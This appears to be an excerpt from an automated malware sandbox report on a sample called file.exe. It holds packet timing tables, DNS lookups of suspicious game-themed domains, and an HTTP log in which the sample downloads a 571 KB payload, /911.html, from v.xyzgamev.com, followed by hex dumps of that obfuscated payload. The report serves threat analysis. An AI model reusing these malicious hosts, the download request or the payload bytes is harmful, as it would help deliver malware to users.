                                                                                            Sep 2, 2022 11:02:36.295399904 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.295444012 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.295454979 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.295521021 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.295562029 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.295569897 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.295620918 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.295660973 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.295670986 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.295742989 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.295785904 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.295795918 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.295871973 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.295918941 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.295931101 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296016932 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296057940 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.296067953 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296117067 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296156883 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.296165943 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296216011 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296271086 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296302080 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.296313047 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296355963 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.296365976 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296443939 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296509027 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296535969 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.296547890 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296575069 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296583891 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.296597004 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.296648026 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.311098099 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.311196089 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.311237097 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.311264038 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.311280966 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.311300039 CEST44349754104.21.40.196192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.311340094 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.311758995 CEST49754443192.168.2.3104.21.40.196
                                                                                            Sep 2, 2022 11:02:36.311783075 CEST44349754104.21.40.196192.168.2.3
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Sep 2, 2022 11:02:33.511513948 CEST5397553192.168.2.38.8.8.8
                                                                                            Sep 2, 2022 11:02:33.533279896 CEST53539758.8.8.8192.168.2.3
                                                                                            Sep 2, 2022 11:02:36.155759096 CEST5113953192.168.2.38.8.8.8
                                                                                            Sep 2, 2022 11:02:36.180162907 CEST53511398.8.8.8192.168.2.3
                                                                                            Sep 2, 2022 11:02:41.867799997 CEST5295553192.168.2.38.8.8.8
                                                                                            Sep 2, 2022 11:02:41.868875027 CEST6058253192.168.2.38.8.8.8
                                                                                            Sep 2, 2022 11:02:41.887213945 CEST53529558.8.8.8192.168.2.3
                                                                                            Sep 2, 2022 11:02:42.046986103 CEST53605828.8.8.8192.168.2.3
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                            Sep 2, 2022 11:02:33.511513948 CEST192.168.2.38.8.8.80x6bcaStandard query (0)v.xyzgamev.comA (IP address)IN (0x0001)
                                                                                            Sep 2, 2022 11:02:36.155759096 CEST192.168.2.38.8.8.80xe8e4Standard query (0)v.xyzgamev.comA (IP address)IN (0x0001)
                                                                                            Sep 2, 2022 11:02:41.867799997 CEST192.168.2.38.8.8.80x4d1Standard query (0)g.agametog.comA (IP address)IN (0x0001)
                                                                                            Sep 2, 2022 11:02:41.868875027 CEST192.168.2.38.8.8.80x4711Standard query (0)g.agametog.com28IN (0x0001)
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                            Sep 2, 2022 11:02:33.533279896 CEST8.8.8.8192.168.2.30x6bcaNo error (0)v.xyzgamev.com104.21.40.196A (IP address)IN (0x0001)
                                                                                            Sep 2, 2022 11:02:33.533279896 CEST8.8.8.8192.168.2.30x6bcaNo error (0)v.xyzgamev.com172.67.188.70A (IP address)IN (0x0001)
                                                                                            Sep 2, 2022 11:02:36.180162907 CEST8.8.8.8192.168.2.30xe8e4No error (0)v.xyzgamev.com104.21.40.196A (IP address)IN (0x0001)
                                                                                            Sep 2, 2022 11:02:36.180162907 CEST8.8.8.8192.168.2.30xe8e4No error (0)v.xyzgamev.com172.67.188.70A (IP address)IN (0x0001)
                                                                                            Sep 2, 2022 11:02:41.887213945 CEST8.8.8.8192.168.2.30x4d1No error (0)g.agametog.com34.142.181.181A (IP address)IN (0x0001)
                                                                                            • v.xyzgamev.com
                                                                                            • pp.abcgameabc.com
                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.349753104.21.40.196443C:\Users\user\Desktop\file.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-09-02 09:02:34 UTC0OUTGET /911.html HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                            Host: v.xyzgamev.com
                                                                                            2022-09-02 09:02:34 UTC0INHTTP/1.1 200 OK
                                                                                            Date: Fri, 02 Sep 2022 09:02:34 GMT
                                                                                            Content-Length: 571230
                                                                                            Connection: close
                                                                                            Last-Modified: Mon, 29 Aug 2022 04:55:04 GMT
                                                                                            ETag: "8b75e-5e75a112fbded"
                                                                                            Accept-Ranges: bytes
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p8raR3gjpFMbGZ9jXJ1w0kRKIyykFCV46XA%2FpARxLcVtBZsMHKzZ8lmeW5%2FCM7iNjebgb2LSZUxnM3x5qWior4S%2F65bmDZEmd2%2FfWsKZGrdUZcJTAVAAN%2Felwt4hwNm83Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 74451146d8fd996c-FRA
                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                            2022-09-02 09:02:34 UTC0INData Raw: 50 2c cc 00 48 68 a2 6a 1e ff 91 3f e8 eb cf 4f 7d 33 e8 e1 38 76 2c 29 63 6d 6c 91 54 2f f0 cc da e3 13 56 f7 72 dc 93 17 ef b9 d6 f6 6e a7 3f 79 0d 18 6f 7a 23 56 af da b4 fe ed f5 98 4e ff 7b 1f d0 a6 ee ed e2 21 f0 cc cb f9 59 17 22 e3 9a d9 29 76 85 54 92 2e d7 2e dd 9b 1f e8 dc a4 ee 55 62 a7 56 d4 d4 2a db a9 29 c5 95 9d 38 94 ca 85 2c 17 25 16 7b 34 c2 79 57 72 41 ec 61 33 36 26 1a 18 2c e3 bc fe 18 56 f0 be ea f2 a2 6c 39 fc 79 0d c0 a4 e6 33 39 fc 79 0d ca 07 77 57 a6 6a f4 6f 78 ae 06 0d f6 e7 49 9f 9c 3b 86 aa 25 f7 11 70 b7 62 0c e8 3e da cb 6a a7 82 b6 92 a6 6a 1e 88 61 77 54 92 dc 72 a2 86 a6 6a 2e a6 12 17 6f f7 2f c5 8e 37 d4 17 dd 9a 2c 3d 75 6b a7 e1 69 df d2 2f 68 e1 eb a3 a6 6a 2a 6a ee 50 a6 6a 09 c4 88 3f e2 a5 2d 58 11 6b a7 d2 52
                                                                                            Data Ascii: P,Hhj?O}38v,)cmlT/Vrn?yoz#VN{!Y")vT..UbV*)8,%{4yWrAa36&,Vl9y39ywWjoxI;%pb>jjawTrj.o/7,=uki/hj*jPj?-XkR
                                                                                            2022-09-02 09:02:34 UTC1INData Raw: a7 6a f4 6f c2 af d8 ae 06 0d 6c 26 fc fa 25 f3 55 44 e3 2e 60 e8 02 c6 eb 26 eb e1 74 3e 22 96 36 67 fa de a7 6a 2c a2 d4 d1 e2 2f 57 3d 00 fa 35 a6 16 15 6e 14 f1 00 2e be 0a 11 58 0e cf 99 68 3e cb 9f 6b c7 c4 27 e8 96 2e c8 7c 2f 68 e1 a5 ec a7 6a 66 44 58 f3 53 ef d4 1f 60 26 2a e4 f4 c4 59 e7 d4 bc 0e 14 29 55 5d 62 63 5b fa 04 16 14 1b 15 27 28 86 89 6c e5 db af 2b f1 c5 bc 0a a9 62 17 69 d3 d6 db 8b f3 5b e7 d4 a6 c0 49 66 21 53 e7 d4 96 c0 72 2e a6 16 e8 ec dc 69 db da 96 2e 1d 14 51 5e 13 e4 ae 2a a6 16 91 16 d3 61 65 64 64 54 dd 60 95 27 95 d2 ee dd 9c 2a 13 5b e3 68 af da a4 1e 95 65 90 d9 c3 3f 3e 0c a4 1a d2 6e a6 1a a9 db 35 cd db ef b2 ec f7 f0 b7 2d ae 19 6a a7 a6 54 f5 a6 6f 77 04 1f f4 ef ac 12 19 6b 09 0e e3 eb 2d 1f d1 bb f1 6b 31 36
                                                                                            Data Ascii: jol&%UD.`&t>"6gj,/W=5n.Xh>k'.|/hjfDXS`&*Y)U]bc['(l+bi[If!Sr.i.Q^*aeddT`'*[he?>n5-jTowk-k16
                                                                                            2022-09-02 09:02:34 UTC2INData Raw: 29 7b cb d8 b4 1a 01 1d 53 d2 db e0 2a 70 f5 2f ec e2 df 54 67 fb 36 e2 4c 14 c9 a0 6a 6b 82 f5 94 e4 d5 53 3d dc 53 cc 68 5a c2 0e 42 f5 2f 12 0c e7 6a a2 c3 8f d5 cf ea 27 6a f4 6f 0e c0 2e 85 54 41 4f 5a 54 ea bc 6e a6 bf c9 d2 39 1f fd 85 a4 32 35 fd a2 b7 c3 1b 6a 67 af 5c 91 62 ae 5c 7c 0b 58 1a a7 e8 42 43 ea 6d a1 2a df 56 af 05 41 a2 0a 8a a5 49 8d 61 a6 65 a9 6a 85 4c a3 6a a5 10 dc 1f 6f b7 c6 68 a7 7a 8a d7 37 3a 67 e3 2f ef 22 ee a2 63 ab 6f 24 6a 2b e0 21 69 47 8f a2 6a a5 79 56 8a a7 68 a5 2a e7 64 a9 7e 32 fe bc 64 22 ec a5 75 3c db 93 6a 3b ed b4 67 a2 3e 73 f8 b5 fa 32 6f a9 84 c6 e8 a3 60 29 ed 03 cf a2 fa 37 5c 91 6a 77 43 5a 6e 9f d1 a9 ea 22 e5 a8 98 59 6e e7 a3 21 fc be b9 bc 24 a8 6b 3c fc 98 70 87 41 83 a4 41 8c 5c d0 25 21 e7 43
                                                                                            Data Ascii: ){S*p/Tg6LjkS=ShZB/j'jo.TAOZTn925jg\b\|XBCm*VAIaejLjohz7:g/"co$j+!iGjyVh*d~2d"u<j;g>s2o`)7\jwCZn"Yn!$k<pAA\%!C
                                                                                            2022-09-02 09:02:34 UTC4INData Raw: b6 4a 0c a4 0a bf 5a 2a 1d 25 e7 67 60 e3 f5 ae 16 1b 97 3a cb 30 f9 7a 60 80 a2 da 07 6e bc b5 75 f1 68 ce 59 c6 36 7b 68 e3 01 8b 97 78 54 85 e2 15 23 d8 1b 65 14 1d f3 ba 51 3c 13 71 8b eb f5 7f 92 7c 96 9f 55 0a c0 ed 52 85 62 6b ca 99 3c 71 c7 8b b6 8d cf 6b 7a 21 90 21 13 1a c2 5e 76 90 fc b0 69 3f d7 4d 95 0b 9b c9 f5 74 52 51 69 7d 4a 57 a7 4a 04 d2 9c 1f d8 15 d1 79 b7 6a 22 19 25 ec de ac e6 de 1f b9 39 45 d5 8d b1 06 6b 23 a3 a1 25 fd 68 b6 8c 86 a2 e1 ed ff a0 fa 39 dc 4a 2a 92 31 8e 90 bf dd 75 10 2c 57 11 e6 d5 3b e7 6e e3 35 1f 9e fc 1a 49 ec a7 4b 16 df d5 c2 2d 13 9b 74 c9 7a 7c a2 ec 9d 88 ba ab 7a b3 e9 69 3b f3 3b a3 f4 61 37 d3 87 28 ce 0b ed 17 33 f4 28 dc 70 17 ca f0 d5 3f 5e c2 57 bf d8 1a b3 65 eb 75 43 cd da 0c d1 a7 db 46 99 b4
                                                                                            Data Ascii: JZ*%g`:0z`nuhY6{hxT#eQ<q|URbk<qkz!!^vi?MtRQi}JWJyj"%9Ek#%h9J*1u,W;n5IK-tz|zi;;a7(3(p?^WeuCF
                                                                                            2022-09-02 09:02:34 UTC5INData Raw: aa 28 19 5f 53 cb 33 a4 e3 fa b1 a7 6a a7 e1 e3 8e 7b 17 29 60 a9 e7 63 22 92 d6 6d a0 6e 2b 58 ae c9 33 d9 f7 a1 42 67 6b be cb cc f4 88 18 40 76 4c ab 9c 96 2a 23 e6 2b 69 66 66 43 50 76 66 ab 67 f9 d7 c3 6b 23 43 db fe 22 bc b2 2c 92 d2 a2 ee 30 a1 6d 18 82 f1 73 ea 68 24 2d 77 fb 32 ba 68 e1 aa 63 3c 26 18 76 d1 d5 9b 63 ab a8 24 3c bb 67 eb 70 18 f4 4a d7 8f ed 08 45 28 ca f6 0e a3 29 18 2e 86 c4 a9 74 54 aa 9e 16 ee 10 f7 cc 13 66 9f e2 6f 11 d9 23 d9 ee ba 83 bf 70 e5 78 7a a2 1e c6 a4 79 b1 d4 22 ff a0 6a d9 a9 0d 83 26 a8 6e 9c 26 1d 59 13 26 67 6a cb 21 01 61 e8 16 9e af e2 27 e9 e2 a6 6a e8 0e 07 22 e6 e8 e8 12 9b a5 81 b2 0c bc 95 d8 27 12 a1 46 b7 1e 9d da 56 2c ac 1a 12 2e 2a 6d a4 a2 c6 c2 ae 1a b1 44 a2 84 0d c3 80 e0 a6 e7 3b 77 ca 6f 57
                                                                                            Data Ascii: (_S3j{)`c"mn+X3Bgk@vL*#+iffCPvfgk#C",0msh$-w2hc<&vc$<gpJE().tTfo#pxzy"j&n&Y&gj!a'j"'FV,.*mD;woW
                                                                                            2022-09-02 09:02:34 UTC6INData Raw: 2a e9 ff c5 09 f3 67 e9 ab 7c 3c ed b5 a4 f6 d8 14 4d 82 d0 1f da 1d ec a5 b4 f6 e3 63 11 6d 74 44 3a e9 75 02 cc a5 66 27 68 67 74 f6 5b 16 7b 33 86 4f 56 ae 0e f9 32 f5 06 5f 2a 57 20 cc 01 cd 02 4b 2e 18 25 d1 fb f5 2f 1e 34 b0 f2 5c 51 6f 1b 77 68 74 bb 16 0e 72 eb 5f f0 ce ea 53 a3 c0 9a 51 bd 2b e3 e2 d2 0b 35 2a dc 26 f7 63 22 e7 08 f4 3c b1 5b 86 aa 47 4a ae 9a 37 32 b2 4e 95 90 eb 2f e7 b5 f7 fc ff f5 72 20 77 3a eb 43 90 2f a0 7f d2 5b 2c 10 a9 80 5f 76 19 ac dc 8e f1 26 93 c7 33 1e d2 7b ab 3f 6f 82 47 32 6a 1f 43 a6 e7 00 2d 8a 58 80 9a 06 c3 18 b7 31 be 69 86 4f 12 f6 d7 f7 ef f4 b6 7f e6 55 5b ba cc 5e 0e dd 04 ca 8a 86 64 7e ad 44 a2 9c 35 24 4b 81 ed 89 0d 83 4b b0 67 ee 55 3d 21 cf ab 33 1f e0 f0 5e ba 7a af e5 4e 1e f2 63 bc c4 08 1e bf
                                                                                            Data Ascii: *g|<McmtD:uf'hgt[{3OV2_*W K.%/4\Qowhtr_SQ+5*&c"<[GJ72N/r w:C/[,_v&3{?oG2jC-X1iOU[^d~D5$KKgU=!3^zNc
                                                                                            2022-09-02 09:02:34 UTC8INData Raw: 75 07 42 a8 e2 9b df a9 79 22 7b b3 f5 ab 51 1b 7e 36 2f 13 1e b4 29 1f 41 4a 46 a5 e9 bc 36 67 a9 62 4c 83 40 8d e1 2e 2c a3 a9 e4 ae f3 d2 a2 84 92 d5 2f 6e fe 7f 63 62 0e b9 a7 6a d8 2c 26 29 a3 3a 1f 69 4c 46 83 e9 a9 cb 83 65 c2 00 f7 b1 3c 72 50 c4 ee 75 ad 77 48 c7 f7 64 a8 64 27 b0 94 64 cc 39 f5 3a 7c d1 68 c3 d5 c5 e3 a1 4b d4 f0 5f 63 71 4e 5b 62 84 34 64 3e 76 9d 50 24 ef 2a e9 1f 8a 08 c4 fe 61 8a 4d a1 45 8c 7e b8 27 12 19 ea f3 a6 07 59 a7 fc d9 b0 b8 88 68 2c 04 62 17 38 a4 ab a6 6c 6d f1 b7 3c 8b dd 6f 91 d2 88 c0 eb d7 c3 35 63 77 f5 2f 22 bc 01 5b e2 e1 2d 39 a4 c4 08 4e 56 4f c7 d2 e5 db aa ed a9 0d cf 66 c1 42 67 bf d4 4e ad 45 81 63 29 8e 8b 3e 34 67 95 de a8 e7 2b 78 88 90 6e ef e2 f4 f6 fc ff 20 ed ab 64 9a 54 f4 3a fc 79 0d 4b 3c
                                                                                            Data Ascii: uBy"{Q~6/)AJF6gbL@.,/ncbj,&):iLFe<rPuwHdd'd9:|hK_cqN[b4d>vP$*aME~'Yh,b8lm<o5cw/"[-9NVOfBgNEc)>4g+xn dT:yK<
                                                                                            2022-09-02 09:02:34 UTC9INData Raw: 2c 1c ce c0 57 29 fa ce 22 8f 61 57 32 10 2d ed f4 ca 2f 9d c9 0e a1 08 b6 58 cb 35 94 d9 0c 03 ec e8 14 94 52 90 0e 1d 90 48 a4 60 27 2f 68 2b e0 63 24 e3 9c 05 a4 68 5e 2a 4f c7 6b e9 49 23 e5 7c f7 2c d0 7c 48 ef d3 13 76 dc c6 6c a4 37 b1 a6 2b 0b 3b 5f 79 ed 09 9a 7e b9 3a db 58 fe 69 23 0b b0 e0 96 41 3a d0 5e 1e e3 e3 eb 86 89 99 55 a5 0a f9 26 cf 86 90 b4 cd 1f 80 c6 6d d7 60 90 15 3c 82 41 44 21 dd 97 d1 3b 07 e9 5e b0 f3 3e 0f 29 3e d3 5b da 24 cc 29 61 22 f9 5d 8f 11 81 f5 68 4f 8a 2e eb a4 e8 26 94 63 ea dd ab 5f 13 27 6a ed c0 4c 0b 32 15 4f 82 0a 43 b3 1e 62 9b d7 2a c7 3a 74 05 5f de 4d 24 c5 5c fe 03 8e 47 60 b8 d7 e2 4b ff dc 71 c6 12 5b f3 fb c2 3a 34 9c dd d0 b5 b3 c4 63 10 7d 42 d8 19 a2 82 84 94 90 68 2a e3 f8 30 d0 15 8e c7 62 01 bf
                                                                                            Data Ascii: ,W)"aW2-/X5RH`'/h+c$h^*OkI#|,|Hvl7+;_y~:Xi#A:^U&m`<AD!;^>)>[$)a"]hO.&c_'jL2OCb*:t_M$\G`Kq[:4c}Bh*0b
                                                                                            2022-09-02 09:02:34 UTC10INData Raw: f7 08 cc e3 3b 57 9d 50 81 9c 1b e6 01 bc 2d 10 f2 bb 0e b7 3e 90 39 f3 3f f9 a2 34 78 f9 11 c4 76 d8 09 87 29 c4 4e 28 a2 c4 ca 61 0c d7 c1 44 83 76 0c 51 f2 bf 7b 61 eb cd f7 16 e3 50 20 93 0c 42 92 ca 7f d0 16 24 e9 ec 35 b8 b9 12 3b 1e a1 dd 46 e7 c5 4d fb 93 12 90 e3 e5 d6 c7 5b 61 b7 45 c3 68 1c 27 f9 a0 40 f6 95 04 68 a6 39 74 fa b7 6a f0 6e a4 d2 8b 0a 01 68 af e9 62 14 67 a0 14 ad ed ed 24 13 ee 5a d1 14 22 a6 a6 aa ae a2 de b9 4b aa 21 f9 73 6c 2c a7 e5 e5 64 12 1c a7 a1 1a 14 29 27 29 6c 72 77 e3 6a 66 d3 06 f7 0c 42 91 8f 3d 8d 47 94 a6 61 2b c3 00 f7 dc 37 82 2e b8 16 68 82 b0 58 ea 27 ea 5e 14 e8 2f aa 8a 50 7f e5 5a a3 95 65 1f 13 e6 ac 67 e2 cd 45 04 77 d6 9c 29 c3 04 0e 3a 6a 28 a3 e9 5c 36 83 15 c9 bc 20 0a a3 a6 4c 69 a7 6a df d5 20 2e
                                                                                            Data Ascii: ;WP->9?4xv)N(aDvQ{aP B$5;FM[aEh'@h9tjnhbg$Z"K!sl,d)')lrwjfB=Ga+7.hX'^/PZegEw):j(\6 Lij .
                                                                                            2022-09-02 09:02:34 UTC12INData Raw: 48 e5 49 64 59 72 e7 2a 58 e2 dc 8e 20 07 a8 63 27 29 67 0c da 89 2f 15 50 b7 ee 89 e8 aa 60 ea f9 2b a6 6f 1c c2 ee 8b 54 fa c0 76 d4 b4 fa e1 24 86 43 6d 1e de f3 bf e4 a8 5e b1 df b1 dc 9c a6 e2 2e 67 84 d0 bd 8f aa 40 e5 7a 3a a5 85 0b f6 d2 8e a1 ad cd 61 6b 05 ec ef 66 a6 69 5a 80 aa d2 22 89 61 2e c7 42 c6 56 7d ae ec 5e 1a a3 c7 5e b7 03 ce 6f 7a 68 35 dd a7 ca f0 67 4a 15 50 22 64 93 63 3e 2d 7e aa f0 24 8a b4 9f a4 6b a9 c2 ad ad 41 e1 dd f1 e5 4e 6a 58 d4 3d 0e 80 f2 8a 0b 26 f7 f7 2e 28 b1 5a c6 97 19 2c a1 78 36 e8 d6 f3 c0 0e fe cf b2 4c 87 e6 6e 29 2f a4 f4 96 5b 90 5c f3 22 de 73 07 e6 23 e3 b0 65 b8 35 9d 56 bb 64 04 c8 6e cb 8e ef a9 cd 5a dd 76 66 80 5e 86 a9 c5 e3 98 da 00 4c 5e 1a 0e 22 09 8f 21 a1 ed c5 8a 71 7d e6 7a 2c 91 c7 c0 07
                                                                                            Data Ascii: HIdYr*X c')g/P`+oTv$Cm^.g@z:akfiZ"a.BV}^^ozh5gJP"dc>-~$kANjX=&.(Z,x6Ln)/[\"s#e5VdnZvf^L^"!q}z,
                                                                                            2022-09-02 09:02:34 UTC13INData Raw: 2e 74 81 6f de 41 f0 58 1f 2e d6 6a d3 d0 d6 4d 7d b1 0e d5 53 6c ec ce 1f 8f 43 69 ce 96 3d 83 19 93 92 3b 99 84 db 2d a1 17 13 5b e3 b0 82 54 9f 29 f1 a0 f0 2e 5d 61 cd fa d2 1a 04 4e b5 a5 70 e5 ef 9a 90 dd 10 02 84 73 bc 27 2e 40 c7 36 35 6f a1 a2 c3 0b a9 e7 ab 25 ed 9b 51 e2 d7 2d 92 a6 9c 32 6b ec 95 4a d4 fe b6 11 95 4a 92 52 42 af a4 8b 8f 27 19 25 01 3b 12 5c 6b d5 17 ff c3 8f 8e 62 ff 36 51 8f 87 c1 42 b6 a9 12 ad 01 de 58 23 e0 1a c2 4b 92 9a 70 cc ca 8a a0 a5 63 6a 8e e3 50 55 cf 0a 4f 63 45 55 f7 93 82 bc c3 6a 94 59 1d c3 85 51 8d 20 3d a7 90 fd 4d 5f f7 1d c6 28 00 54 4b 3a a6 e7 48 08 a8 32 f4 ae d9 35 77 3d ce 76 31 ef 2c 41 04 18 d6 92 bf 0c 2e e1 50 79 c6 bb 78 7a f8 2a 83 0a 0b 82 eb 07 c2 92 36 d2 83 fb a7 0e e2 6a 34 fd f2 db 32 7f
                                                                                            Data Ascii: .toAX.jM}SlCi=;-[T).]aNps'.@65o%Q-2kJJRB'%;\kb6QBX#KpcjPUOcEUjYQ =M_(TK:H25w=v1,A.Pyxz*6j42
                                                                                            2022-09-02 09:02:34 UTC14INData Raw: 64 29 63 ed e5 af a3 60 d8 1f 79 87 54 41 49 74 7c 29 a4 22 6e ee e2 a5 2c 4c 05 5e 87 c6 5b 2f 86 c7 2b 4b e1 9c 51 ac 8c f0 d0 37 8c fc 3e 24 76 f5 8a 08 76 f4 79 af a3 4b 0b f8 cc 78 43 62 af 6a 01 5e 3f e6 bc 76 e5 0b d7 7d 1f 80 f2 aa 6c ac 1e 4a f6 2d 25 c7 dc b8 29 ed 2e 71 28 aa 1f 42 f5 78 ef 27 92 da f3 26 bc 97 d2 63 83 4c 84 40 2a 71 b0 e9 a9 5b 93 e3 27 a7 fc 71 ab e9 a9 47 8c ed ab e9 a9 43 2a c8 20 62 28 2e 70 fe 96 20 ed ee 97 c4 f7 80 f6 ae 08 45 f9 b1 c2 ca 19 6b a7 c4 7d 6c 2b b9 1f 00 98 02 a3 b2 65 27 4b df fa a4 96 6a 0b b2 dc 65 4d 09 dd a6 6f a7 69 51 57 a8 e5 76 fe e9 f6 e3 f5 64 23 6c 7a 77 61 2f e7 e3 64 20 77 39 f1 b7 59 17 22 62 f6 49 f0 35 a7 c2 7b dc 1b 90 8a fe e1 ee f7 b3 a3 67 d2 60 a7 6a 32 d7 32 57 5c 6e 25 38 b4 20 ea
                                                                                            Data Ascii: d)c`yTAIt|)"n,L^[/+KQ7>$vvyKxCbj^?v}lJ-%).q(Bx'&cL@*q['qGC* b(.p Ek}l+e'KjeMoiQWvd#lzwa/d w9Y"bI5{g`j22W\n%8
                                                                                            2022-09-02 09:02:34 UTC15INData Raw: 19 e5 0c 0a 76 ba 76 b2 3e a1 6b 13 d5 38 a3 e5 22 cf 76 12 a4 dc 02 3e e0 bc 3f 35 b8 2d 2a 3c d2 de 3b 7b 9f 80 16 15 6e 10 d8 26 c8 00 3f 47 2a 75 e7 e8 ce 77 b9 e5 23 ab aa 77 bb a6 fa 51 85 ab 53 bb ca c1 35 7c 1a 71 5a cf 65 b0 e3 7a 38 27 f8 3c c9 87 e1 e4 6a 44 80 ae 89 46 79 50 b4 5f 7f e0 5b 49 6a 0b 48 4c 7c 43 ac 1b 15 cb a9 84 28 76 3a 08 e3 e1 5e f5 d4 64 b1 52 ea 06 0d f4 6b 34 cc 8c e7 99 a6 d1 e1 62 23 46 03 65 31 3e b5 15 aa 31 d0 be 5e e8 0d ba 5f 37 0d 71 3e c6 72 ec 14 36 56 34 47 f8 c5 ed de bd 46 f9 6c d8 77 a1 54 93 ea 4f 89 2f 73 38 2e 13 54 e0 33 d1 1f 83 10 ca 3b 95 85 21 df 3c d5 a7 7e 5f 91 28 6d c7 00 99 3f f7 7f e8 38 9e 9d bd c5 8a 35 f7 e7 61 2d 43 78 5e 69 a7 f3 aa ff 59 4f 28 13 99 df 7e 10 36 de df 50 e8 e6 14 1f ed a3
                                                                                            Data Ascii: vv>k8"v>?5-*<;{n&?G*uw#wQS5|qZez8'<jDFyP_[IjHL|C(v:^dRk4b#Fe1>1^_7q>r6V4GFlwTO/s8.T3;!<~_(m?85a-Cx^iYO(~6P
                                                                                            2022-09-02 09:02:34 UTC17INData Raw: eb a3 d2 19 2a 29 e4 31 9c 82 e4 a1 79 33 6c e8 1e 97 80 c9 22 aa 13 1c 2c eb 22 af eb 3a 76 26 6e 62 be 7b b2 80 58 6a 2c c1 ca d3 37 87 23 66 b9 2c a1 35 f9 6f 77 04 1f f5 6d 62 87 b5 2d f3 a3 32 14 27 83 00 07 a0 cd 82 04 a0 26 e7 e6 a2 2c f1 b3 44 8f e3 79 2f 3e 18 2d 13 8b b5 2d 17 47 be 9a 44 78 13 0c 3d d7 2f 6a a9 e1 62 9a 6f 58 e9 a2 3b b6 5c 57 ec f2 7a a0 6e a3 e9 24 6d a9 e3 5d 07 bb 10 d1 2e 6c e0 4d 83 2e 20 67 fa 26 7a cd ff 0a c7 2d 0f 5f 13 9e 1a 80 6a 5d 37 39 a3 f1 3f ab 33 ce 56 43 7f a7 15 a5 e8 fc ab bf 67 28 31 32 af ae ea 80 4c ca 5a fb dc 00 7f 83 43 6b d3 5b 0a af be 1b d7 1a e3 bb db 7b 6d a7 1e d5 93 58 80 42 d8 e1 7e 3c fc ba 02 8c 2d b3 ff e2 df dd 6c ac 66 56 46 74 6f a6 5d 62 77 44 6c c1 9a bf ff e2 c5 4d 1f 7e d3 a8 ee dc
                                                                                            Data Ascii: *)1y3l",":v&nb{Xj,7#f,5owmb-2'&,Dy/>--GDx=/jboX;\Wzn$m].lM. g&z-_j]79?3VCg(12LZCk[{mXB~<-lfVFto]bwDlM~
